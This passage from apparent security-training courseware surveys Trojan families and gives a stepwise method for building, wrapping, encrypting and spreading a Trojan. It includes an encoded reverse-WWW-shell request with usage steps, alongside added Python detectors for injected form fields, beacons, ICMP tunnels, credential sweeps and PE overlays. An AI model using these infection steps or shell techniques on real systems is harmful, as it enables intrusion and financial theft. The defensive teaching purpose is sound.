As the name indicates, "rootkit" consists of two terms, i.e., "root" and "kit." "Root" is a UNIX/Linux term that is the equivalent of "administrator" in Windows. The word "kit" denotes programs that allow someone to obtain root-/admin-level access to the computer by executing the programs in the kit. Rootkits are potent backdoors that specifically attack the root or OS. Unlike backdoors, rootkits cannot be detected by observing services, system task lists, or registries. Rootkits provide full control of the victim OS to the attacker. Rootkits cannot propagate by themselves, and this fact has precipitated a great deal of confusion. In reality, rootkits are just one component of what is called a blended threat. Blended threats typically consist of three snippets of code: dropper, loader, and rootkit. The dropper is the executable program or file that installs the rootkit. Activating the dropper program usually entails human intervention, such as clicking on a malicious e-mail link. Once initiated, the dropper launches the loader program and then deletes itself. Once active, the loader typically causes a buffer overflow, which loads the rootkit into memory.
• EquationDrug Rootkit

EquationDrug is a dangerous computer rootkit that attacks the Windows platform. It performs targeted attacks against various organizations and lands on the infected system by being downloaded and executed by the Trickler dubbed "DoubleFantasy," covered by TSL20110614-01 (Trojan.Win32.Micstus.A). It allows a remote attacker to execute shell commands on the infected system.

Figure 7.8: Screenshot showing start of EquationDrug Rootkit

Some additional rootkit Trojans are as follows:
• CEIDPageLock
• Wingbird
• GrayFish
• Finfisher
• ZeroAccess
• Whistler
E-banking Trojans

E-banking Trojans are extremely dangerous and have emerged as a significant threat to online banking. They intercept the victim's account information before the system can encrypt it and send it to the attacker's command-and-control center. Installation of these Trojans takes place on the victim's computer when he or she clicks a malicious email attachment or a malicious advertisement. Attackers program these Trojans to steal minimum and maximum monetary amounts, so that they do not withdraw all the money in the account, thereby avoiding suspicion. These Trojans also create screenshots of the bank account statement, so that the victim thinks that there is no variation in his/her bank balance and is not aware of this fraud unless he/she checks the balance from another system or an ATM. These Trojans may also steal victims' data such as credit card numbers and billing details, and transmit them to remote hackers via email, FTP, IRC, or other methods.

Figure 7.9: Working of Banking Trojan

A banking Trojan is a malicious program that allows attackers to obtain personal information about users of online banking and payment systems. The working of a banking Trojan includes the following:
• TAN Grabber: A Transaction Authentication Number (TAN) is a single-use password for authenticating online banking transactions. Banking Trojans intercept valid TANs entered by users and replace them with random numbers. The bank will reject such invalid random numbers. Subsequently, the attacker misuses the intercepted TAN with the target's login details.

• HTML Injection: The Trojan creates fake form fields on e-banking pages, thereby enabling the attacker to collect the target's account details, credit card number, date of birth, etc. The attacker can use this information to impersonate the target and compromise his/her account.

• Form Grabber: A form grabber is a type of malware that captures a target's sensitive data, such as IDs and passwords, from a web browser form or page. It is an advanced method for collecting the target's Internet banking information. It analyses POST requests and responses to the victim's browser. It compromises the scramble pad authentication and intercepts the scramble pad input as the user enters his/her Customer Number and Personal Access Code.

• Covert Credential Grabber: This type of malware remains dormant until the user performs an online financial transaction. It works covertly to replicate itself on the computer and edits the registry entries each time the computer is started. The Trojan also searches the cookie files that had been stored on the computer while browsing financial websites. Once the user attempts to make an online transaction, the Trojan covertly steals the login credentials and transmits them to the hacker.
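A defensive counterpart to the HTML injection mechanism above is to compare the form fields a client actually renders against the fields the bank's page template is known to contain: a login form that suddenly asks for a card number, PIN or date of birth has been tampered with. The block below is an added example, not code from the courseware or from any bank; it uses Python's html.parser, and the baseline page, the tampered page and the field names are constructed for the illustration.

```python
"""Added example (not from the courseware): detect form fields injected into a
banking login page by diffing the rendered page against the known template.
Both pages and all field names are constructed."""
from html.parser import HTMLParser

# Constructed baseline: the fields the bank's login template is known to contain.
BASELINE_LOGIN_HTML = """
<form action="/login" method="post">
  <input type="hidden" name="csrf_token" value="constructed">
  <input type="text" name="customer_number">
  <input type="password" name="access_code">
  <button type="submit">Sign in</button>
</form>
"""

# Constructed: the same page after a Trojan injected extra fields into the DOM.
TAMPERED_LOGIN_HTML = """
<form action="/login" method="post">
  <input type="hidden" name="csrf_token" value="constructed">
  <input type="text" name="customer_number">
  <input type="password" name="access_code">
  <label>For your security, confirm your card details</label>
  <input type="text" name="card_number">
  <input type="text" name="atm_pin">
  <input type="text" name="date_of_birth">
  <button type="submit">Sign in</button>
</form>
"""


class FormFieldCollector(HTMLParser):
    """Collect (form action, field name, control type) for every named control."""

    def __init__(self):
        super().__init__()
        self.current_form = None
        self.fields = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "form":
            self.current_form = attributes.get("action", "")
        elif tag in ("input", "select", "textarea") and attributes.get("name"):
            control = attributes.get("type", tag).lower()
            self.fields.append((self.current_form, attributes["name"], control))

    def handle_endtag(self, tag):
        if tag == "form":
            self.current_form = None


def form_fields(html):
    parser = FormFieldCollector()
    parser.feed(html)
    return parser.fields


def injected_fields(baseline_html, observed_html):
    """(form, field) pairs present in the observed page but absent from the template."""
    expected = {(form, name) for form, name, _ in form_fields(baseline_html)}
    observed = {(form, name) for form, name, _ in form_fields(observed_html)}
    return sorted(observed - expected)


def sensitive_injections(baseline_html, observed_html,
                         keywords=("pin", "card", "birth", "ssn", "cvv")):
    """Injected fields whose names ask for data a login form never needs."""
    return [(form, name) for form, name in injected_fields(baseline_html, observed_html)
            if any(word in name.lower() for word in keywords)]
```

In practice the observed HTML comes from a client-side integrity script that serialises the rendered form and reports it to the bank, or from a user-reported page capture; the server-side template is the trusted reference. Field names alone miss injected labels and overlays, so a production check also compares the visible text around the form.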

Some methods used by banking Trojans to steal users' information are as follows:
o Keylogging
o Form data capture
o Inserting fraudulent form fields
o Screen captures and video recording
o Mimicking financial websites
o Redirecting to banking websites
o Man-in-the-middle attack
• E-banking Trojan: Dreambot

Dreambot banking Trojans are also known as updated versions of Ursnif or Gozi. Dreambot Trojans have long been used by hackers, and they have been regularly updated with more sophisticated capabilities. They can be delivered through the Emotet dropper or RIG exploit kit. This Trojan can also be embedded as a macro in an MS Word document and sent to victims via spam emails. If this Trojan gets into the victim's machine, it will covertly create registry keys and processes, and attempt to connect to multiple malicious C2C servers.

Figure 7.10: HTTPS requests to malicious servers

After connecting to the C2C server, it will perform keylogging and send the keylog data to the attacker. This keylog data can include passwords of banking websites, OTP messages, secure transaction passwords, PINs, etc.

Figure 7.11: Screenshot of Dreambot Banking Trojan keylog data

Some additional e-banking Trojans are as follows:
• Emotet
• PandaBanker
• Ramnit
• Zeus
• Dridex
• UrizoneBanker
Point-of-Sale Trojans

As the name indicates, point-of-sale (POS) Trojans are a type of financial fraudulent malware that target POS and payment equipment such as credit card/debit card readers. Attackers use POS Trojans to compromise such POS equipment and grab sensitive information regarding credit cards, such as credit card number, holder name, and CVV number. Since POS plays a critical role in the retail industry, these Trojans will have a greater impact on retail businesses and retail customers. The magnetic stripe on a credit card consists of two tracks, namely called TRACK1 and TRACK2. These are critical for completing the transaction using a POS device. Track1 and Track2 comprise critical information related to the credit card. Once a POS Trojan affects and compromises a POS device, it attempts to grab the TRACK1 and TRACK2 information of the card that is inserted in the device. Once the attacker acquires this information, he/she gets full control of the card and can easily perform financial fraud.
• GlitchPOS

It is popularly known as GlitchPOS.A. GlitchPOS is a fake cat game that is embedded in malware and not displayed at the time of execution. It is a Trojan that masquerades as a cat game. When any victim installs the cat game, the Trojan will be executed in the background. GlitchPOS is used by attackers to grab the credit card information of the victim. GlitchPOS has become the most notorious financial Trojan, and its adverse effects have spread across the globe. To steal the credit card information, this Trojan searches for the Track1 and Track2 details in the memory pages of devices.

Figure 7.12: Screenshot of GlitchPOS Trojan

Some additional POS Trojans are as follows:
• LockPoS
• BlackPOS
• FastPOS
• PunkeyPOS
• CenterPOS
• MalumPOS
Defacement Trojans

Defacement Trojans, once spread over the system, can destroy or change the entire content of a database. However, they are more dangerous when attackers target websites, as they physically change the underlying HTML format, resulting in the modification of content. In addition, significant losses may be incurred due to the defacement of e-business targets by Trojans.

Resource editors allow one to view, edit, extract, and replace bitmaps, strings, logos, and icons from any Windows program. They allow viewing and editing of nearly any aspect of a compiled Windows program, from menus to dialog boxes and icons, etc. They employ user-styled custom applications (UCAs) to deface Windows applications.

Figure 7.13: Screenshot showing defaced application

• Restorator

Source: http://www.bome.com

Restorator is a utility for editing Windows resources in applications and their components (e.g., files with .exe, .dll, .res, .rc, and .der extensions). It allows you to add, change, or remove resources such as text, images, icons, sounds, videos, versions, dialogs, and menus in nearly all programs. Using this tool, one can achieve translation/localization, customization, design improvement, and development.

Features:
o Translate existing applications (localization)
o Customize the look and feel of programs
o Replace logos and icons (branding)
o Enhance control over resource files in the software development process
o Hack into the inner workings of applications on the computer

Figure 7.14: Screenshot showing Restorator
Service Protocol Trojans

These Trojans can take advantage of vulnerable service protocols such as VNC, HTTP/HTTPS, and ICMP, to attack the victim's machine.

• VNC Trojans

A VNC Trojan starts a VNC server daemon in the infected system (victim), whereby the attacker connects to the victim using any VNC viewer. Since the VNC program is considered a utility, this Trojan will be difficult to detect using antivirus software. Well-known financial malware such as Dridex, Neverquest, and Gozi employ a hidden virtual network computing (HVNC) module, which allows attackers to gain user-grade access to an infected PC.

Figure 7.15: Working of VNC Trojan
• HTTP/HTTPS Trojans

HTTP/HTTPS Trojans can bypass any firewall and work in reverse, as opposed to a straight HTTP tunnel. They use web-based interfaces and port 80. The execution of these Trojans takes place on the internal host and spawns a child program at a predetermined time. The child program is a user to the firewall; hence, the firewall allows the program to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through an apparently legitimate HTTP request, and sends it a ready signal. The apparently legitimate answer from the attacker's web server is, in fact, a series of commands that the child can execute on the machine's local shell. The attacker converts all the traffic into a Base64-like structure and gives it as a value for a cgi-string to avoid detection.

The following is an example of a connection:

Slave: GET /cgi-bin/order?MSmAe}TgZdgYOdgIO0BqFFVYTg}FLdgxEdbive7kr} HTTP/1.0
Master replies with: g5mAlfbknz

The GET of the internal host (SLAVE) is the command prompt of the shell; the answer is an encoded "ls" command from the attacker on the external server (MASTER). The SLAVE tries to connect to the MASTER daily at a specified time. If necessary, the child is spawned if the shell hangs; the attacker can check and fix it the next day. If the administrator sees connections to the attacker's server and connects it to his/her server, he/she just sees a broken web server because there is a token (password) in the encoded cgi GET request. Support for WWW proxies (e.g., Squid, a fully featured web proxy cache) is available. The program masks its name in the process listing. The programs are reasonably small; the master and slave programs consist of only 260 lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and run "rwwwshell.pl" on the MASTER just before the slave tries to connect.
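Both the reverse-connecting RAT described earlier (server.exe calling out through port 80) and this HTTP shell share two traits that are visible from the network side: an encoded blob carried in an ordinary-looking GET, and a connection that recurs at a fixed time. The block below is an added example, not code from the courseware or from the rwwwshell tool: it runs those two heuristics over constructed proxy log lines (the hosts, client addresses and timestamps are invented), flagging long high-entropy query values and client/host pairs contacted at a near-constant interval.

```python
"""Added example (not from the courseware): heuristics for reverse-WWW-shell style
traffic in web proxy logs. The log lines are constructed; tune the thresholds."""
import math
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log, one "<ISO time> <client> <method> <url>" record per line.
SAMPLE_LOG = """\
2020-06-01T09:00:00 10.0.0.5 GET http://www.example.net/cgi-bin/order?MSmAejTgZdgYOdgIO0BqFFVYTgjFLdgxEdbive7krAbCdEf12
2020-06-01T09:02:10 10.0.0.5 GET http://intranet.local/index.html
2020-06-02T09:00:01 10.0.0.5 GET http://www.example.net/cgi-bin/order?kZ9pQ2rT8wVbN4mL7xJ3cH6sD1fG5aY0eU2iO8pA3sD9f
2020-06-02T11:15:42 10.0.0.7 GET http://news.example.org/article?id=42
2020-06-03T09:00:02 10.0.0.5 GET http://www.example.net/cgi-bin/order?Q7wE2rT9yU4iO1pA6sD3fG8hJ5kL0zX2cV4bN7mM9qW1e
"""

BLOB_RE = re.compile(r"[A-Za-z0-9+/=_-]{32,}")  # long Base64-like token


def shannon_entropy(text):
    """Bits per character; natural language and short IDs sit well below 4."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_query_values(query, min_entropy=4.0):
    """Yield query values that look like an encoded command channel."""
    for param in query.split("&"):
        key, _, value = param.partition("=")
        candidate = value or key  # the shell's request carries the blob with no key at all
        if BLOB_RE.fullmatch(candidate) and shannon_entropy(candidate) >= min_entropy:
            yield candidate


def find_beacons(events, tolerance=0.10):
    """(client, host) pairs contacted at a near-constant interval, three hits or more."""
    beacons = []
    for (client, host), times in sorted(events.items()):
        if len(times) < 3:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        if mean > 0 and max(abs(gap - mean) for gap in gaps) <= tolerance * mean:
            beacons.append((client, host, mean))
    return beacons


def analyze(log_text):
    suspicious = []
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, client, _method, url = line.split()
        parts = urlsplit(url)
        events[(client, parts.hostname)].append(datetime.fromisoformat(timestamp))
        for value in suspicious_query_values(parts.query):
            suspicious.append((client, parts.hostname, parts.path, round(shannon_entropy(value), 2)))
    return {"suspicious_requests": suspicious, "beacons": find_beacons(events)}


if __name__ == "__main__":
    for name, hits in analyze(SAMPLE_LOG).items():
        print(name, hits)
```

Neither heuristic is conclusive on its own: CDN cache-busters and session tokens also look like random blobs, and scheduled update checks also beacon. The combination on one client/host pair, especially toward a host with no business relationship, is what earns an analyst's attention.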
Figure 7.16: Working of HTTP Trojan
• SHTTPD

SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe). When executed, it will turn a computer into an invisible web server. For instance, an attacker connects to the victim using web browser http://10.0.0.5:443 and infects the victim's computer with chess.exe, with Shttpd running in the background and listening on port 443 (SSL).

Figure 7.17: SHTTPD attack process
• HTTP RAT

HTTP RAT uses web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous as they work nearly ubiquitously where the Internet can be accessed.

Features:
o Displays ads and records personal data/keystrokes
o Downloads unsolicited files and disables programs/system
o Floods Internet connection and distributes threats
o Tracks browsing activities and hijacks Internet browser
o Makes fraudulent claims about spyware detection and removal

Figure 7.18: Working of HTTP RAT Trojan

• ICMP Trojans

The Internet Control Message Protocol (ICMP) is an integral part of IP, and every IP module must implement it. It is a connectionless protocol that provides error messages to unicast addresses. The ICMP protocol encapsulates the packets in IP datagrams.

An attacker can hide the data using covert channel methods in a protocol that is undetectable. The concept of ICMP tunneling allows one protocol to be carried over another protocol. ICMP tunneling uses ICMP echo request and reply to carry a payload and stealthily access or control the victim's machine. Attackers can use the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary information tunneling. Network layer devices and proxy-based firewalls do not filter or inspect the contents of ICMP_ECHO traffic, making the use of this channel attractive to hackers. Attackers simply pass, drop, or return the ICMP packets. The Trojan packets themselves masquerade as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information.
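The tunnelling described above is observable to a defender who knows what ordinary echo traffic carries: Windows ping sends a fixed alphabet string, and Linux ping sends a timestamp followed by a counting byte pattern. The following block is an added example, not from the courseware: it builds a few ICMP echo messages with constructed payloads, verifies the RFC 1071 checksum, and classifies each payload as a standard ping pattern or as a tunnel candidate when it is oversized or has a high byte entropy. The thresholds and the sample payloads are assumptions made for the example.

```python
"""Added example (not from the courseware): classify ICMP echo payloads to flag
possible tunnelling. Sample messages are constructed in-line (no sockets used)."""
import math
import struct
from collections import Counter

WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"  # 32-byte pattern sent by Windows ping


def icmp_checksum(data):
    """RFC 1071 ones'-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident, seq, payload, icmp_type=8):
    """Build an ICMP echo request (type 8) or reply (type 0); sample data only."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    checksum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, checksum, ident, seq) + payload


def parse_icmp(message):
    """Split an ICMP message into header fields and payload; a valid checksum re-sums to 0."""
    icmp_type, code, _checksum, ident, seq = struct.unpack("!BBHHH", message[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": message[8:], "checksum_ok": icmp_checksum(message) == 0}


def entropy(data):
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify_payload(payload, max_len=64, max_entropy=4.0):
    if payload == WINDOWS_PING_PAYLOAD:
        return "benign-windows-ping"
    # Linux/BSD ping: 8-byte timestamp, then the bytes 0x10, 0x11, 0x12, ... in order.
    body = len(payload) - 8
    if 0 < body <= 0xF0 and payload[8:] == bytes(range(0x10, 0x10 + body)):
        return "benign-linux-ping"
    if len(payload) > max_len or entropy(payload) > max_entropy:
        return "tunnel-candidate"
    return "unknown"


def analyze_messages(messages):
    """(sequence number, verdict) for every echo request/reply in the list."""
    verdicts = []
    for message in messages:
        info = parse_icmp(message)
        if info["type"] not in (0, 8):
            continue
        verdict = classify_payload(info["payload"]) if info["checksum_ok"] else "bad-checksum"
        verdicts.append((info["seq"], verdict))
    return verdicts


# Constructed sample messages: two normal pings, then two payloads a tunnel might carry.
SAMPLE_MESSAGES = [
    build_echo(0x1234, 1, struct.pack("!Q", 1591002000) + bytes(range(0x10, 0x40))),
    build_echo(0x1234, 2, WINDOWS_PING_PAYLOAD),
    build_echo(0x1234, 3, bytes((i * 37) % 256 for i in range(80))),  # looks encrypted
    build_echo(0x1234, 4, b"\x00" * 512),                             # oversized
]

if __name__ == "__main__":
    for seq, verdict in analyze_messages(SAMPLE_MESSAGES):
        print(seq, verdict)
```

Size and entropy both need a local baseline: "ping -s" with a large size, path-MTU probes and some monitoring agents legitimately produce odd payloads. Volume and regularity per source (the same approach as for HTTP beacons) are what separate a curious administrator from a tunnel.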
Figure 7.19: Working of ICMP Trojan

Mobile Trojans
Mobile Trojans are malicious software that target mobile phones. Mobile Trojan attacks are increasing rapidly due to the global proliferation of mobile phones. The attacker tricks the victim into installing the malicious application. When the victim downloads the malicious app, the Trojan performs various attacks such as banking credential stealing, social networking credential stealing, data encryption, and device locking.

• BasBanke

BasBanke is a Trojan family that runs on Android. The Trojan was first identified in 2018 during the Brazilian elections, registering over 10,000 installations as of April 2019 from the official Google Play Store alone. It is a banking Trojan, and when it infects a device, it will perform keystroke logging, screen recording, SMS interception, and theft of credit card and financial information. To trick users into downloading this Trojan, the Trojan creators advertised it via WhatsApp and Facebook messages. The most widely spread and downloaded malicious version of BasBanke is the fake CleanDroid Android app. CleanDroid projects itself as a mobile junk cleaning and memory boosting app; however, it is actually a banking Trojan.

Figure 7.20: Screenshot of BasBanke Mobile Trojan

Some additional mobile Trojans are as follows:
• Agent Smith
• Hiddad
• AndroRAT
• Rotexy
• Gplayed
• Asacub
• Gustuff
IoT Trojans

Internet of things (IoT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. IoT Trojans are malicious programs that attack IoT networks. These Trojans leverage a botnet to attack other machines outside the IoT network.

• Mirai

Mirai is a self-propagating IoT botnet that infects poorly protected Internet devices (IoT devices). Mirai uses telnet port (23 or 2323) to find those devices that are still using their factory default username and password. Most IoT devices use default usernames and passwords. Mirai can infect such insecure devices (bots) and co-ordinate them to mount a DDoS attack against a chosen victim.

Features:
o Login attempts with 60 different factory default username and password pairs
o Built for multiple CPU architectures (x86, ARM, Sparc, PowerPC, Motorola)
o Connects to C&C to allow the attacker to specify an attack vector
o Increases bandwidth usage for infected bots
o Identifies and removes competing malware
o Blocks remote administration ports

Figure 7.21: Screenshot displaying Mirai DDoS botnet Trojan attack

Prevention: Using anti-Trojan software and updating usernames and passwords can prevent Mirai DDoS botnet Trojan attacks.
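The prevention advice above can be made concrete with two checks. The following block is an added example, not code from the courseware: it scans constructed telnet daemon log lines for the burst of failed logins across many usernames that a default-credential sweep produces (noting whether a login succeeded afterwards), and it audits a constructed device inventory for logins that are still factory defaults and for devices that still expose telnet at all. The log format, the addresses, the inventory and the short default-credential list are all assumptions; the list is not Mirai's.

```python
"""Added example (not from the courseware): spot a default-credential sweep in
telnet daemon logs and audit a device inventory for factory-default logins.
Every log line, address and credential pair below is constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed telnetd log excerpt; the line format is an assumption, not a real daemon's.
SAMPLE_AUTH_LOG = """\
2020-06-01T12:00:01 telnetd: login failed user=root src=203.0.113.9
2020-06-01T12:00:03 telnetd: login failed user=admin src=203.0.113.9
2020-06-01T12:00:05 telnetd: login failed user=support src=203.0.113.9
2020-06-01T12:00:07 telnetd: login failed user=user src=203.0.113.9
2020-06-01T12:00:09 telnetd: login failed user=guest src=203.0.113.9
2020-06-01T12:00:11 telnetd: login failed user=admin src=203.0.113.9
2020-06-01T12:00:13 telnetd: login ok user=admin src=203.0.113.9
2020-06-01T12:05:00 telnetd: login failed user=operator src=198.51.100.4
2020-06-01T12:05:30 telnetd: login ok user=operator src=198.51.100.4
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+) telnetd: login (?P<result>failed|ok) user=(?P<user>\S+) src=(?P<src>\S+)")


def detect_credential_sweep(log_text, window_s=60, min_failures=5, min_users=3):
    """Sources with >= min_failures failed logins over >= min_users usernames
    inside any window_s-second window, plus whether a login later succeeded."""
    by_src = defaultdict(list)
    for match in LINE_RE.finditer(log_text):
        by_src[match["src"]].append((datetime.fromisoformat(match["ts"]),
                                     match["result"], match["user"]))
    findings = {}
    for src, events in by_src.items():
        events.sort()
        fails = [(t, user) for t, result, user in events if result == "failed"]
        burst, start = False, 0
        for end in range(len(fails)):              # sliding window over failures
            while (fails[end][0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            window = fails[start:end + 1]
            if len(window) >= min_failures and len({u for _, u in window}) >= min_users:
                burst = True
                break
        if not burst:
            continue
        first_fail = fails[0][0]
        findings[src] = {
            "failures": len(fails),
            "distinct_users": len({u for _, u in fails}),
            "succeeded_after_failures": any(
                result == "ok" and t > first_fail for t, result, _ in events),
        }
    return findings


# Constructed generic factory defaults to compare against (not Mirai's real list).
DEFAULT_PAIRS = {("admin", "admin"), ("root", "root"), ("admin", "password"),
                 ("root", "12345"), ("user", "user"), ("admin", "")}

# Constructed inventory, as exported from a configuration-management system.
DEVICE_INVENTORY = [
    {"name": "cam-lobby-01", "user": "admin", "password": "admin", "telnet": True},
    {"name": "dvr-02", "user": "svc-dvr", "password": "constructed-long-unique-secret",
     "telnet": False},
]


def audit_device_credentials(devices, defaults=DEFAULT_PAIRS):
    """Names of devices whose login is still a factory default."""
    return [d["name"] for d in devices if (d["user"], d["password"]) in defaults]


def telnet_exposed(devices):
    """Names of devices that still expose telnet, whatever their credentials."""
    return [d["name"] for d in devices if d.get("telnet")]
```

A source that fails five logins across five usernames in ten seconds and then succeeds is the signature worth paging on: the device should be isolated and its credentials rotated, and the inventory audit tells you which other devices the same sweep would have taken.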
Some additional IoT Trojans are as follows:
• Silex/BrickerBot
• Satori
• Torii botnet
• Miori IoT Botnet
• Bashlite IoT Malware
• Gafgyt Botnet
Security Software Disabler Trojans

Security software disabler Trojans stop the working of security programs such as firewalls and IDS, either by disabling them or killing the processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system.

Some security software disabler Trojans are as follows:
• Certlock
• GhostHook
• Trojan.Disabler
Destructive Trojans

The sole purpose of a destructive Trojan is to delete files on a target system. Antivirus software may not detect destructive Trojans. Once a destructive Trojan infects a computer system, it randomly deletes files, folders, and registry entries as well as local and network drives, often resulting in OS failure.

Destructive Trojans are written as simple crude batch files with commands such as "DEL," "DELTREE," or "FORMAT." This destructive Trojan code is usually compiled as .ini, .exe, .dll, or .com files. Thus, it is difficult to determine if a destructive Trojan causes a computer system infection. The attacker can activate these Trojans or they can be set to initiate at a fixed time and date.

Shamoon is still considered as the most destructive Trojan. Shamoon uses a Disttrack payload that is configured to wipe systems as well as virtual desktop interface snapshots. This Trojan propagates internally by logging in using legitimate domain account credentials, copying itself to the system, and creating a scheduled task that executes the copied payload. Other currently prevalent destructive Trojans include Dimnie, GreyEnergy, and Killdisk.

DDoS Trojans
These Trojans are intended to perform DDoS attacks on target machines, networks, or web addresses. They make the victim a zombie that listens for commands sent from a DDoS server on the Internet. There will be numerous infected systems standing by for command from the server, and when the server sends the command to all or a group of the infected systems, since all the systems perform the command simultaneously, a considerable amount of legitimate requests flood the target and cause the service to stop responding. In other words, the attacker, from his/her computer along with several other infected computers, sends multiple requests to the victim and overwhelms the target, leading to a DoS. This can also be achieved by mass spam emails.

Mirai IoT botnet Trojan is still considered as one of the most notorious DDoS attack Trojans. Other recently discovered DDoS attack Trojans that have affected a large number of systems and networks and caused major disruptions in businesses include Electrum DDoS botnet and Bushido Botnet. All these DDoS Trojans have similar attack strategies. They identify the unsecured devices in a network and enslave them to launch a DDoS attack on the victim's machine. Once installed on a Windows computer, the Trojan connects to a command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports. Along with the infected botnet zombies, it performs DDoS attacks in which a zombie floods a target server/machine with malicious traffic.
Command Shell Trojans

A command shell Trojan provides remote control of a command shell on a victim's machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine. Netcat, DNSMessenger, and GCat are some of the latest command shell Trojans.

Figure 7.22: Working of Command Shell Trojan
How to Infect Systems Using a Trojan
An attacker can remotely control the system hardware and software by installing a Trojan on the system. Once the Trojan is installed on the system, the data become vulnerable to threats. In addition, the attacker can perform attacks on third-party systems.

Attackers deliver Trojans in many ways to infect target systems:

• Trojans are included in bundled shareware or downloadable software. When users download such files, the target systems automatically install the Trojans.
• Different pop-up ads try to trick users. They are programmed by the attacker such that regardless of whether users click YES or NO, a download will begin and the Trojan will automatically install itself on the system.
• Attackers send the Trojans as email attachments. When users open these malicious attachments, the Trojans are automatically installed.
• Users are sometimes tempted to click on different types of files, such as greeting cards, porn videos, and images, which might contain Trojans. Clicking on these files installs the Trojans.

Attackers infect a target machine using a Trojan in the following steps:
• Step 1: Create a new Trojan packet using various tools such as Trojan Horse Construction Kit, Social Engineering Toolkit (SET), and Beast. New Trojans have a higher chance of succeeding in compromising the target system, as the security mechanisms might fail to detect them. These Trojans can be transferred to the victim's machine using a dropper or downloader.

• Step 2: Employ a dropper or a downloader to install the malicious code on the target system. The dropper appears to users as a legitimate application or a well-known and trusted file. However, when it is run, it extracts the malware components hidden in it and executes them, usually without saving them to the disk, to avoid detection. Droppers include decoy images, games, or benign messages in their packages, which serve to divert users' attention from malicious activities. Downloaders are malware transporters that do not contain the actual malware file; however, they contain the link from where the actual Trojan can be downloaded. When a downloader is executed on the target machine, it connects back to the attacker's server and downloads the intended Trojan on the victim's machine. Droppers can easily evade firewalls; however, a downloader can be detected with the help of network analyzer tools.

• Step 3: Employ a wrapper such as petite.exe, Graffiti.exe, IExpress Wizard, or EliteWrap to help bind the Trojan executable to legitimate files to install it on the target system.

• Step 4: Employ a crypter such as BitCrypter to encrypt the Trojan to evade detection by firewalls/IDS.

• Step 5: Propagate the Trojan by implementing various methods such as sending it via overt and covert channels, exploit kits, emails, and instant messengers, thereby tricking users into downloading and executing it. An active Trojan can perform malicious activities such as irritating users with constant pop-ups, changing desktops, changing or deleting files, stealing data, and creating backdoors.

• Step 6: Deploy the Trojan on the victim's machine by executing the dropper or downloader software to disguise it. The deployed file contains wrapped and encrypted malware.

• Step 7: Execute the damage routine. Most malware contain a damage routine that delivers payloads. Some payloads just display images or messages, whereas others can even delete files, reformat hard drives, or cause other damage. The damage routine can also include malware beaconing.
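Steps 2 and 3 describe hiding a payload inside an apparently legitimate executable. A common artefact of that technique is data appended after the last PE section (the "overlay"), which a defender can measure from the file headers alone. The block below is an added example, not code from the courseware or from any of the wrappers or crypters named above: it parses the section table of a constructed minimal PE image, reports any overlay, and notes whether the overlay starts with another MZ header or has the near-random byte distribution that encrypted or packed data shows. The sample images are built in-line and are not runnable programs.

```python
"""Added example (not from the courseware): measure the overlay of a PE file, the
region after the last section where wrappers and droppers often append a payload.
The sample images are constructed in-line and are not runnable programs."""
import math
import struct
from collections import Counter


def build_minimal_pe(section_data):
    """Construct a minimal PE32 image with one section; sample input only."""
    e_lfanew = 0x80
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos_header += b"\x00" * (e_lfanew - len(dos_header))
    opt_size = 0xE0  # size of a PE32 optional header
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    optional_header = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)
    headers_end = e_lfanew + 4 + 20 + opt_size + 40
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF         # file alignment of 512 bytes
    raw_size = (len(section_data) + 0x1FF) & ~0x1FF
    section_header = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                                 raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = dos_header + b"PE\x00\x00" + file_header + optional_header + section_header
    image += b"\x00" * (raw_ptr - len(image))
    return image + section_data.ljust(raw_size, b"\x00")


def end_of_sections(data):
    """Offset just past the highest section's raw data, read from the PE headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    first_section = e_lfanew + 24 + opt_size
    end = first_section + 40 * num_sections          # at least the headers themselves
    for i in range(num_sections):
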